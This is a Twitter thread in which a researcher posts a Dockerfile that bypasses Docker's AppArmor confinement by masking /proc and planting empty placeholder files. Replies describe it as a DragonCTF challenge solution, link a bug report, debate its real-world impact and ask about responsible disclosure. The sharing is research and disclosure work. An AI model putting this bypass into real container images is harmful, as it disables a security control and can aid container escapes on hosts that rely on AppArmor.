Twitter | Pretraživanje | |
Adam Iwaniuk
Docker apparmor bypass: FROM ubuntu:18.04 # get rid of procfs VOLUME /proc # fake files to avoid fail on run COPY empty /proc/self/attr/exec COPY empty /proc/self/fd/4 COPY empty /proc/self/fd/5 COPY empty /proc/self/status # cmd will not have apparmor restrictions CMD YOUR_CMD
Reply Retweet Označi sa "sviđa mi se" More
Adam Iwaniuk 22. ruj
Odgovor korisniku/ci @DragonSectorCTF @allesctf
It was intended solution to one of the challenges in DragonCTF organized by this weekend. It was solved by one team, congratulations!
Reply Retweet Označi sa "sviđa mi se"
leoluk@chaos.social 22. ruj
Odgovor korisniku/ci @adam_iwaniuk @allesctf
Our writeup/bug report for the AppArmor bypass:
Reply Retweet Označi sa "sviđa mi se"
Bill Plein 🏴‍☠️ 23. ruj
Odgovor korisniku/ci @adam_iwaniuk @IanColdwater
I totally get the cool solution for the CTF but what practical application does the bug report solve? The only one I can think of is where a private registry scanner requires Ubuntu and the image scan passes. I can create a base image with any security holes I want. (1/2)
Reply Retweet Označi sa "sviđa mi se"
Bill Plein 🏴‍☠️ 23. ruj
Odgovor korisniku/ci @adam_iwaniuk @IanColdwater
The same situation could be created with a malicious Ubuntu install on a VM. Or on bare metal with SAN Storage. It is an Ubuntu problem. And requires insider access or running VMs or Container images blindly.
Reply Retweet Označi sa "sviđa mi se"
ytcracker 🎤💻🔬🗝🏴‍☠️🤙 23. ruj
Odgovor korisniku/ci @adam_iwaniuk @IanColdwater
na zdorovie
Reply Retweet Označi sa "sviđa mi se"
Sune Keller 23. ruj
Odgovor korisniku/ci @adam_iwaniuk
What about responsible disclosure?
Reply Retweet Označi sa "sviđa mi se"